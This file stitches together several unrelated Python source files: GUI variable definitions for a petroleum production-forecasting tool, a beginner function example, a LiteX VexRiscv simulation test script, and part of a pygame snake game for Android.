class WaterInjectionPotentialConstant(FacilityVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = LiquidFlowRateUnit(unit_system)
self._frame_label = 'Water inj.'
self._menu_label = 'Constant water inj.'
self._image = ico.water_injection_rate_16x16
self._limits = (0., None)
self._plot_label = r'Constant water injection'
self._legend = r'Con. water inj.'
self._tooltip = 'Set to provide a constant water injection potential\n' \
'for the well. If this is not set, the required\n' \
'potential will be calculated based on voidage replacement.'
self._pytype = float
self._round_of = 1
self._id = 'constant_water_inj'
# ======================================================================================================================
# Auxiliary Variables
# ======================================================================================================================
class Name(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Name'
self._pytype = str
self._id = 'name'
class ScalerEvaluation(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Evaluation'
self._image = ico.right_arrow_16x16
self._pytype = str
self._tooltip = 'Mathematical expression used to transform\n' \
'static parameters into scaling parameters.'
class SummaryEvaluation(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Multiplier'
self._image = ico.right_arrow_16x16
self._pytype = str
self._tooltip = 'Mathematical expression used to calculate\n' \
'multiplier to the production profile.'
class IncludeModel(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Include model'
self._pytype = bool
class MergeType(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Merge type'
self._choices = ('', 'Smooth', 'Conditional')
self._choice_images = (None, ico.merge_16x16, ico.merge_16x16)
self._pytype = tuple
class MergePoint(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None)
self._frame_label = (None, 'Merge at (x-axis)', 'Merge at (y-axis)')
self._round_off = 2
self._pytype = float
class MergeRate(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None)
self._frame_label = (None, 'Merge rate', None)
self._round_off = 5
self._pytype = float
class Multiplier(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Multiplier'
self._round_off = 1
self._pytype = float
class Addition(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Addition'
self._round_off = 1
self._pytype = float
class RunFrom(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Run from'
self._choices = (None, 'First point', 'Last point', 'Specific')
self._choice_images = (None, ico.first_point_16x16, ico.last_point_16x16, ico.specific_point_16x16)
self._pytype = tuple
class RunFromSpecific(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Axis'
self._choices = (None, 'x-axis', 'y-axis')
self._choice_images = (None, ico.x_axis_16x16, ico.y_axis_16x16)
self._pytype = tuple
class RunFromValue(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Value'
self._limits = (0., None)
self._round_off = 2
self._pytype = float
class RunTo(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Run to (x-axis)'
self._image = ico.run_16x16
self._round_off = 1
self._pytype = float
class Frequency(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Frequency'
self._choices = ('Yearly', 'Quarterly', 'Monthly', 'Delta')
self._choice_images = (ico.dates_year_16x16, ico.dates_quarter_16x16, ico.dates_16x16, ico.timestep_16x16)
self._pytype = tuple
class TimeDelta(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None, TimeUnit('days'))
self._frame_label = (None, None, None, 'Delta')
self._round_off = 1
self._pytype = float
self._tooltip = 'Number of days for each time-step.'
class TimeStep(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = TimeUnit('days')
self._frame_label = 'Time-step'
self._round_off = 1
self._pytype = float
self._tooltip = 'Number of days for each time-step.'
class SaveAllSamples(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Save all samples'
self._pytype = bool
self._tooltip = 'Save all the sampled runs. This allows for\n' \
'- Display distribution shading in Cartesian charts\n' \
'- Display Histograms of summary variables\n' \
'Saved file size is substantially larger.'
class SimulateConstrainted(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Simulate with constraints'
self._pytype = bool
self._tooltip = 'Simulate using voidage replacement\n' \
'assumptions and surface network constraints.\n' \
'Rates will be based on the choke position and\n' \
'potentials will become instantaneous potentials.'
class Samples(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = AmountUnit()
self._frame_label = '# of samples'
self._plot_label = 'Samples'
self._limits = (0., None)
self._pytype = int
self._tooltip = 'Number of stochastic samples to run.'
# ======================================================================================================================
# Scenario and Event Variables
# ======================================================================================================================
class StartDate(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Start'
self._pytype = date
self._tooltip = 'Start date of prediction'
class EndDate(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'End'
self._pytype = date
self._tooltip = 'End date of prediction'
class EventTrigger(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Trigger'
self._choices = ('Scenario', 'Date')
self._choice_images = (ico.scenario_16x16, ico.event_16x16)
self._pytype = tuple
class EventDate(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None)
self._frame_label = (None, 'Date')
self._pytype = date
class OffsetYears(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (TimeUnit('years'), None)
self._frame_label = ('Offset', None)
self._round_off = 2
self._pytype = float
# ======================================================================================================================
# Uncertainty Variables
# ======================================================================================================================
class UncertainValue(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Value'
self._round_off = 2
self._pytype = float
self._tooltip = 'Deterministic value used for sampling.'
class Distribution(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Distribution'
self._choices = ['', 'Swanson', 'Uniform', 'Triangular', 'Normal', 'Lognormal']
self._choice_images = (None, ico.swanson_distribution_16x16, ico.uniform_distribution_16x16,
ico.triangular_distribution_16x16, ico.normal_distribution_16x16,
ico.lognormal_distribution_16x16)
self._pytype = tuple
self._tooltip = 'Probability distribution used for sampling\n' \
'of the properties uncertainty space.'
class DistributionParameter1(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, '+/-%', '+/-%', '+/-%', '+/-%', '+/-%')
self._frame_label = (None, 'Min', 'Min', 'Min', 'Mean', 'Mean')
self._limits = (-100., None)
self._pytype = int
self._tooltip = 'Distribution parameters is calculated\n' \
'as +/- percentage of Value.'
class DistributionParameter2(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, '+/-%', '+/-%', '+/-%', '+% of mean', '+% of mean')
self._frame_label = (None, 'Mode', 'Max', 'Mode', 'St. dev.', 'St. dev.')
self._limits = (-100., None)
self._pytype = int
self._tooltip = 'Distribution parameters is calculated\n' \
'as +/- percentage of Value.'
class DistributionParameter3(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, '+/-%', None, '+/-%', None, None)
self._frame_label = (None, 'Max', None, 'Max', None, None)
self._limits = (-100., None)
self._pytype = int
self._tooltip = 'Distribution parameters is calculated\n' \
'as +/- percentage of Value.'
# ======================================================================================================================
# Analogue Function Variables
# ======================================================================================================================
class PlaceholderMethod(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Method'
self._choices = ('' * 5)
self._choice_images = (None,)
self._pytype = tuple
class PlaceholderInput(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = ('' * 5)
self._pytype = int
class PlaceholderParameter1(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = ('' * 5)
self._pytype = int
class PlaceholderParameter2(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = ('' * 5)
self._pytype = int
class PlaceholderParameter3(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = ('' * 5)
self._pytype = int
class HistoryMethod(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Method'
self._choices = ('History', 'Moving average')
self._choice_images = (ico.history_fit_16x16, ico.moving_average_fit_16x16)
self._pytype = tuple
class HistoryInput(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None)
self._frame_label = (None, 'n')
self._pytype = int
class HistoryParameter1(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None)
self._frame_label = (None, None)
self._pytype = int
class HistoryParameter2(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None)
self._frame_label = (None, None)
self._pytype = int
class HistoryParameter3(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None)
self._frame_label = (None, None)
self._pytype = int
class CurvefitMethod(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Method'
self._choices = ('Constant', 'Linear', 'Exponential', 'Power', 'Logarithmic')
self._choice_images = (ico.constant_fit_16x16, ico.linear_fit_16x16, ico.exponential_fit_16x16, ico.power_fit_16x16, ico.logarithmic_fit_16x16)
self._pytype = tuple
class CurvefitInput(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None, None, None)
self._frame_label = (None, None, None, None, None)
self._pytype = int
class CurvefitParameter1(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None, None, None)
self._frame_label = ('con.', 'a', 'a', 'a', 'a')
self._round_off = 3
self._pytype = float
class CurvefitParameter2(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None, None, None)
self._frame_label = (None, 'b', 'b', 'b', 'b')
self._round_off = 2
self._pytype = float
class CurvefitParameter3(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None, None, None)
self._frame_label = (None, None, 'c', 'c', None)
self._round_off = 2
self._pytype = float
class NonParametricMethod(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Method'
self._choices = ('Bow-wave',)
self._choice_images = (ico.bow_wave_16x16,)
self._pytype = tuple
class NonParametricInput(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = ('Mid',)
self._round_off = 2
self._pytype = float
class NonParametricParameter1(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = (None,)
self._pytype = int
class NonParametricParameter2(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = (None,)
self._pytype = int
class NonParametricParameter3(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None,)
self._frame_label = (None,)
self._pytype = int
class DCAMethod(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Method'
self._choices = ('Exponential', 'Hyperbolic', 'Harmonic')
self._choice_images = (ico.exponential_dca_16x16, ico.hyperbolic_dca_16x16, ico.harmonic_dca_16x16)
self._pytype = tuple
class DCAInput(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None)
self._frame_label = (None, 'b', None)
self._round_off = 2
self._pytype = float
class DCAParameter1(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None)
self._frame_label = ('q', 'q', 'q')
self._round_off = 2
self._pytype = float
class DCAParameter2(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None)
self._frame_label = ('D', 'D', 'D')
self._round_off = 5
self._pytype = float
class DCAParameter3(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = (None, None, None)
self._frame_label = (None, None, None)
self._pytype = int
# ======================================================================================================================
# Scaling Variables
# ======================================================================================================================
class ScalerVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._round_off = 2
self._pytype = float
self._type = 'scalers'
class CumulativeScaler(ScalerVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Cum'
self._menu_label = 'Cumulative'
self._image = ico.cum_scaler_16x16
self._plot_label = r'Cumulative Scaler, $S_{cum}$'
self._legend = r'$S_{cum}$'
self._id = 's_cum'
class RateScaler(ScalerVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'Rate'
self._menu_label = 'Rate'
self._image = ico.rate_scaler_16x16
self._plot_label = r'Rate Scaler, $S_{rate}$'
self._legend = r'$S_{rate}$'
self._id = 's_rate'
class FFWScaler(ScalerVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'FFW'
self._menu_label = 'FFW'
self._image = ico.ffw_scaler_16x16
self._plot_label = r'Fractional Flow of Water Scaler, $S_{ffw}$'
self._legend = r'$S_{ffw}$'
self._id = 's_ffw'
class FFGScaler(ScalerVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = Unitless()
self._frame_label = 'FFG'
self._menu_label = 'FFG'
self._image = ico.ffg_scaler_16x16
self._plot_label = r'Fractional Flow of Gas Scaler, $S_{ffg}$'
self._legend = r'$S_{ffg}$'
self._id = 's_ffg'
class OnsetScaler(ScalerVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = TimeUnit('years')
self._frame_label = 'Onset'
self._menu_label = 'Onset'
self._image = ico.time_16x16 # TODO: Draw icon
self._plot_label = r'Fractional Flow Onset, $\Delta$'
self._legend = r'Onset'
self._id = 'onset'
class InitialWCTScaler(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = PercentageUnit()
self._frame_label = 'Ini. WCT'
self._menu_label = 'Initial WCT'
self._image = ico.wct_ini_scaler_16x16
self._limits = (0., 100.)
self._plot_label = r'Initial Water-cut'
self._legend = r'Ini. WCT'
self._pytype = int
self._type = 'scalers'
self._id = 'wct_ini'
class ScalerSelection(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Scaler'
self._choices = ('Cumulative', 'Rate', 'FFW', 'FFG')
self._choice_images = (ico.cum_scaler_16x16, ico.rate_scaler_16x16, ico.ffw_scaler_16x16, ico.ffg_scaler_16x16)
self._pytype = tuple
# ======================================================================================================================
# Selection of possible static parameters used as input to scaling laws
# ======================================================================================================================
class StaticVariable(Variable):
def __init__(self):
super().__init__()
self._limits = (0., None)
self._round_off = 1
self._pytype = float
self._type = 'statics'
class CompletedLength(StaticVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = LengthUnit(unit_system)
self._frame_label = 'Well length'
self._menu_label = 'Well length'
self._image = ico.completion_16x16
self._plot_label = r'Well Length'
self._legend = r'Well length'
self._id = 'length'
class HydrocarbonFeet(StaticVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = AreaUnit(unit_system)
self._frame_label = 'HCFT'
self._menu_label = 'HCFT'
self._image = ico.HCFT_16x16
self._plot_label = r'HCFT'
self._legend = r'HCFT'
self._id = 'hcft'
class HydrocarbonPoreVolume(StaticVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = VolumeUnit(unit_system)
self._frame_label = 'HCPV'
self._menu_label = 'HCPV'
self._image = ico.HCPV_16x16
self._plot_label = r'HCPV'
self._legend = r'HCPV'
self._id = 'hcpv'
class Permeability(StaticVariable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = PermeabilityUnit()
self._frame_label = 'Permeability'
self._menu_label = 'Permeability'
self._image = ico.permeability_16x16
self._plot_label = r'Permeability'
self._legend = r'Permeability'
self._id = 'permeability'
class OilDensity(StaticVariable):
def __init__(self, unit_system):
super().__init__()
self._unit = DensityUnit(unit_system)
self._frame_label = 'Oil density'
self._menu_label = 'Oil density'
self._image = ico.stoiip_16x16
self._plot_label = r'Oil density, $\rho_o$'
self._legend = r'$\rho_o$'
self._id = 'oil_density'
# ======================================================================================================================
# Plot Option Variables
# ======================================================================================================================
class ShowData(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Show data'
self._choices = ('No', 'Yes')
self._choice_images = (None, ico.history_match_16x16)
self._pytype = tuple
class ShowUncertainty(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Show uncertainty'
self._choices = ('No', 'Yes')
self._choice_images = (ico.mid_chart_16x16, ico.prediction_16x16)
self._pytype = tuple
class SplitBy(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Split by'
self._choices = ('None', 'Entity', 'Simulation', 'Variable')
self._choice_images = (None, ico.folder_closed_16x16, ico.project_16x16, ico.grid_properties_16x16)
self._pytype = tuple
class GroupBy(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Group by'
self._choices = ('None', 'Unit')
self._choice_images = (None, None)
self._pytype = tuple
class ColourBy(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Colour by'
self._choices = ('None', 'Entity type') # TODO: Not yet correct
self._choice_images = (None, None)
self._pytype = tuple
# ======================================================================================================================
# Variable plotting option variables (used on frames)
# ======================================================================================================================
class VariableColour(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Colour'
self._tooltip = 'Select colour of line to display in cartesian charts.'
self._pytype = wx.Colour
class VariableDrawstyle(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Drawstyle'
self._choices = ('Default', 'Steps (pre)', 'Steps (mid)', 'Steps (post)')
self._choice_images = (None, None, None, None)
self._pytype = tuple
class VariableLinestyle(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Linestyle'
self._choices = ('Solid', 'Dashed', 'Dash-dot', 'Dotted')
self._choice_images = (None, None, None, None)
self._pytype = tuple
# ======================================================================================================================
# Settings variables
# ======================================================================================================================
class SettingsUnitSystem(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Unit system'
self._choices = ('Field', 'Metric')
self._choice_images = (None, None)
self._pytype = tuple
LINE_SIZES = ('1', '2', '3', '4', '5', '6', '7', '8', '9', '10')
TEXT_SIZES = ('6', '8', '10', '12', '14', '16', '18', '20', '22', '24')
TEXT_BITMAPS = (None, None, None, None, None, None, None, None, None, None)
class SettingsLinewidth(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Linewidth'
self._choices = LINE_SIZES
self._choice_images = (ico.linewidth_1_16x16, ico.linewidth_2_16x16, ico.linewidth_3_16x16,
ico.linewidth_4_16x16, ico.linewidth_5_16x16, ico.linewidth_6_16x16,
ico.linewidth_7_16x16, ico.linewidth_8_16x16, ico.linewidth_9_16x16,
ico.linewidth_10_16x16)
self._pytype = tuple
class SettingsMarkerSize(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Marker size'
self._choices = LINE_SIZES
self._choice_images = (ico.markersize_1_16x16, ico.markersize_2_16x16, ico.markersize_3_16x16,
ico.markersize_4_16x16, ico.markersize_5_16x16, ico.markersize_6_16x16,
ico.markersize_7_16x16, ico.markersize_8_16x16, ico.markersize_9_16x16,
ico.markersize_10_16x16)
self._pytype = tuple
class SettingsTickLabelSize(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Tick-label size'
self._choices = TEXT_SIZES
self._choice_images = TEXT_BITMAPS
self._pytype = tuple
class SettingsLabelSize(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Label size'
self._choices = TEXT_SIZES
self._choice_images = TEXT_BITMAPS
self._pytype = tuple
class SettingsLegendSize(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Legend size'
self._choices = TEXT_SIZES
self._choice_images = TEXT_BITMAPS
self._pytype = tuple
PERCENTILE_OPTIONS = ('P05', 'P10', 'P20', 'P25', 'P30', 'P40', 'P50', 'P60', 'P70', 'P75', 'P80', 'P90', 'P95')
PERCENTILE_BITMAPS = (None, None, None, None, None, None, None, None, None, None, None, None, None)
class SettingsLowCase(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Low case'
self._choices = PERCENTILE_OPTIONS
self._choice_images = PERCENTILE_BITMAPS
self._pytype = tuple
class SettingsMidCase(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Mid case'
self._choices = PERCENTILE_OPTIONS
self._choice_images = PERCENTILE_BITMAPS
self._pytype = tuple
class SettingsHighCase(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'High case'
self._choices = PERCENTILE_OPTIONS
self._choice_images = PERCENTILE_BITMAPS
self._pytype = tuple
class SettingsShadingResolution(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Resolution'
self._choices = ('2', '4', '6', '8', '10')
self._choice_images = (None, None, None, None, None)
self._pytype = tuple
class SettingsShadingLow(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Low bound'
self._choices = PERCENTILE_OPTIONS
self._choice_images = PERCENTILE_BITMAPS
self._pytype = tuple
class SettingsShadingHigh(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'High bound'
self._choices = PERCENTILE_OPTIONS
self._choice_images = PERCENTILE_BITMAPS
self._pytype = tuple
# ======================================================================================================================
# Duplicate variables
# ======================================================================================================================
class Duplicates(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = AmountUnit()
self._frame_label = '# of duplicates'
self._pytype = int
self._tooltip = 'Number of duplicates to create.'
class DuplicateAsControlled(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Duplicate as controlled'
self._pytype = bool
self._tooltip = 'Duplicated entities will only allow minor\n' \
'configuration. All properties will be determined\n' \
'by the controlling entity (the one duplicated).'
| 2.28125 | 2 |
functions.py | gjoe344/python-learning | 0 | 12765099 |
#Input, arguments
def add(x,y):
z = x + y
b = 'I am here'
a = 'hello'
return z,b,a
x = 20
y = 5
# Calling function
print(add(x,y))
z = add(x,y) #same thing
print(z)
print(add(10,5)) #same thing | 3.78125 | 4 |
.sim-test.py | niw/linux-on-litex-vexriscv | 329 | 12765100 | #!/usr/bin/env python3
#
# This file is part of Linux-on-LiteX-VexRiscv
#
# Copyright (c) 2019-2021, Linux-on-LiteX-VexRiscv Developers
# SPDX-License-Identifier: BSD-2-Clause
import os
import sys
import pexpect
import time
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument("--sdram-module", type=str)
args = parser.parse_args()
tests = [
{
'id': 'linux-on-litex-vexriscv',
'command': f'./sim.py --with-sdram --sdram-module {args.sdram_module}',
'cwd': os.getcwd(),
'checkpoints': [
{ 'timeout': 240, 'good': [b'\n\\s*BIOS built on'] },
{ 'timeout': 60, 'good': [b'\n\\s*VexRiscv Machine Mode software'] },
{ 'timeout': 240, 'good': [b'Memory: \\d+K/\\d+K available'] },
]
}
]
def run_test(id, command, cwd, checkpoints):
print(f'*** Test ID: {id}')
print(f'*** CWD: {cwd}')
print(f'*** Command: {command}')
os.chdir(cwd)
p = pexpect.spawn(command, timeout=None, logfile=sys.stdout.buffer)
checkpoint_id = 0
for cp in checkpoints:
good = cp.get('good', [])
bad = cp.get('bad', [])
patterns = good + bad
timeout = cp.get('timeout', None)
timediff = time.time()
try:
match_id = p.expect(patterns, timeout=timeout)
except pexpect.EOF:
print(f'\n*** {id}: premature termination')
return False;
except pexpect.TIMEOUT:
timediff = time.time() - timediff
print(f'\n*** {id}: timeout (checkpoint {checkpoint_id}: +{int(timediff)}s)')
return False;
timediff = time.time() - timediff
if match_id >= len(good):
break
sys.stdout.buffer.write(b'<<checkpoint %d: +%ds>>' % (checkpoint_id, int(timediff)))
checkpoint_id += 1
is_success = checkpoint_id == len(checkpoints)
# Let it print rest of line
match_id = p.expect_exact([b'\n', pexpect.TIMEOUT, pexpect.EOF], timeout=1)
p.terminate(force=True)
line_break = '\n' if match_id != 0 else ''
print(f'{line_break}*** {id}: {"success" if is_success else "failure"}')
return is_success
for test in tests:
success = run_test(**test)
if not success:
sys.exit(1)
sys.exit(0)
| 2.203125 | 2 |
main.py | filipposerafini/PythonVsAndroid | 1 | 12765101 | import pygame_sdl2
pygame_sdl2.import_as_pygame()
import random
import pygame
from pygame.locals import *
import android
class AppleTypes:
NORMAL, GOLDEN, LIFE, SPECIAL = range(4)
class Apple:
def __init__(self, snakes):
retry = True
while retry:
retry = False
self.x = random.randint(0, CELL_COUNT_X - 1)
self.y = random.randint(0, CELL_COUNT_Y - 1)
for snake in snakes:
for i in range(0, snake.length):
if self.x == snake.x[i] and self.y == snake.y[i]:
retry = True
self.type = random.choice([0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 3])
self.expiration = 0
self.moves = 0
self.direction = random.choice([0, 1, 2, 3])
if not type == AppleTypes.NORMAL:
self.expiration = APPLE_EXPIRATION
if type == AppleTypes.SPECIAL:
self.moves = SPECIAL_FRAMES
def move(self):
if self.moves == 0:
dir = random.choice([
self.direction,
self.direction,
self.direction,
self.direction,
self.direction,
self.direction,
self.direction,
(self.direction + 1) % 4,
(self.direction + 2) % 4,
(self.direction + 3) % 4])
if dir == 0:
if not self.x == CELL_COUNT_X - 1:
self.x += 1
else:
self.x -= 1
self.direction = 2
if dir == 1:
if not self.y == CELL_COUNT_Y - 1:
self.y += 1
else:
self.y -= 1
self.direction = 3
if dir == 2:
if not self.x == 0:
self.x -= 1
else:
self.x += 1
self.direction = 1
if dir == 3:
if not self.y == 0:
self.y -= 1
else:
self.y += 1
self.direction = 0
self.moves = SPECIAL_FRAMES
else:
self.moves -= 1
def draw(self, surface, cell_size):
body = pygame.Surface((cell_size, cell_size))
body.fill(APPLE_COLORS[self.type])
surface.blit(body, (self.x * cell_size, self.y * cell_size))
class Snake:
def __init__(self, x, y, length, lives, color):
self.x = [x]
self.y = [y]
self.length = length
self.lives = lives
self.color = color
self.expiration = 0
self.temp_color = color
self.direction = 0 if self.x[0] < CELL_COUNT_X / 2 else 2
self.score = 0
for i in range(1, self.length):
self.x.append(self.x[0] - i if self.x[0] < CELL_COUNT_X / 2 else self.x[0] + i)
self.y.append(self.y[0])
def changeDirection(self, direction):
if direction != (self.direction + 2) % 4:
self.direction = direction
return True
return False
def updatePosition(self):
for i in range(self.length - 1 , 0, -1):
self.x[i] = self.x[i - 1]
self.y[i] = self.y[i - 1]
if self.direction == 0:
self.x[0] += 1
elif self.direction == 1:
self.y[0] += 1
elif self.direction == 2:
self.x[0] -= 1
elif self.direction == 3:
self.y[0] -= 1
def isCollision(self, x, y):
if self.x[0] == x and self.y[0] == y:
return True
else:
return False
def changeColor(self, color):
self.temp_color = color
self.expiration = SNAKE_EXPIRATION
def addPiece(self, count):
for i in range(0, count):
self.x.append(self.x[self.length - 1])
self.y.append(self.y[self.length - 1])
self.length += 1
def eatApple(self, apple):
if self.isCollision(apple.x, apple.y):
if apple.type == AppleTypes.NORMAL:
SOUNDS['Apple'].play()
self.addPiece(1)
self.score += 10
elif apple.type == AppleTypes.GOLDEN:
SOUNDS['Golden'].play()
self.addPiece(3)
self.score += 50
elif apple.type == AppleTypes.LIFE:
SOUNDS['Life'].play()
self.addPiece(1)
if self.lives < 5:
self.lives += 1
else:
self.score += 20
elif apple.type == AppleTypes.SPECIAL:
SOUNDS['Special'].play()
self.addPiece(5)
self.score += 100
return True
return False
def hitSnake(self, snake):
for i in range(1 if self is snake else 0, snake.length):
if self.isCollision(snake.x[i], snake.y[i]) and not self.temp_color == RED:
self.score -= 50
self.lives -= 1
return True
return False
def hitBorder(self):
if self.x[0] < 0 or self.x[0] > CELL_COUNT_X - 1:
self.x[0] = CELL_COUNT_X - 1 if self.x[0] < 0 else 0
if not self.temp_color == RED:
self.score -= 20
self.lives -= 1
return True
return False
elif self.y[0] < 0 or self.y[0] > CELL_COUNT_Y - 1:
self.y[0] = CELL_COUNT_Y - 1 if self.y[0] < 0 else 0
if not self.temp_color == RED:
self.score -= 20
self.lives -= 1
return True
return False
else:
return False
def draw(self, surface, cell_size):
body = pygame.Surface((cell_size, cell_size))
body.fill(self.temp_color)
for i in range(0, self.length):
surface.blit(body, (self.x[i] * cell_size, self.y[i] * cell_size))
if self.expiration > 0:
self.expiration -= 1
else:
self.temp_color = self.color
class Game:
def __init__(self, players, fps, controls):
self.fps = fps
self.controls = controls
self.snakes = []
self.snakes.append(Snake(random.randint(0, CELL_COUNT_X / 2), random.randint(0, CELL_COUNT_Y / 2), 15, 3, BLUE))
if players == 2:
self.snakes.append(Snake(random.randint(CELL_COUNT_X / 2, CELL_COUNT_X - 1), random.randint(CELL_COUNT_Y / 2, CELL_COUNT_Y - 1), 15, 3, GREEN))
self.apple = Apple(self.snakes)
def restart(self):
return Game(len(self.snakes), self.fps, self.controls)
def updateSnakes(self):
if self.apple.expiration == 0:
self.apple.type = AppleTypes.NORMAL
else:
self.apple.expiration -= 1
if self.apple.type == AppleTypes.SPECIAL:
self.apple.move()
for snake in self.snakes:
snake.updatePosition()
if snake.hitSnake(snake) or snake.hitBorder():
SOUNDS['Hit'].play()
android.vibrate(0.2)
snake.changeColor(RED)
if snake.lives == 0:
return False
if snake.eatApple(self.apple):
if not self.apple.type == AppleTypes.NORMAL:
snake.changeColor(APPLE_COLORS[self.apple.type])
self.apple = Apple(self.snakes)
return True
def drawSnakes(self, surface, cell_size):
for snake in self.snakes:
snake.draw(surface, cell_size)
self.apple.draw(surface, cell_size)
class Page(object):
def __init__(self, width, height, surface):
self.surface = surface
self.surface.fill(BLACK)
self.buttons = {}
def update(self):
return
def getButton(self, x, y):
for button, rect in self.buttons.items():
if rect.collidepoint(x * self.surface.get_width(), y * self.surface.get_height()):
return button
def display_text(self, text, dimension, color, position, background=None):
font = pygame.font.Font('resources/font.otf', int(dimension))
text_surface = font.render(text, True, color, background)
rect = text_surface.get_rect()
rect.midbottom = position
self.surface.blit(text_surface, rect)
return rect
class Menu(Page):
def __init__(self, width, height, surface):
super(Menu, self).__init__(width, height, surface)
self.display_text('Python', height / 4, BLUE, (2 * width / 7 + width / 64, 2 * height / 5))
self.display_text('VS', height / 7, RED, (width / 2, 2 * height / 5 - height / 50))
self.display_text('Android', height / 4, GREEN, (5 * width / 7, 2 * height / 5))
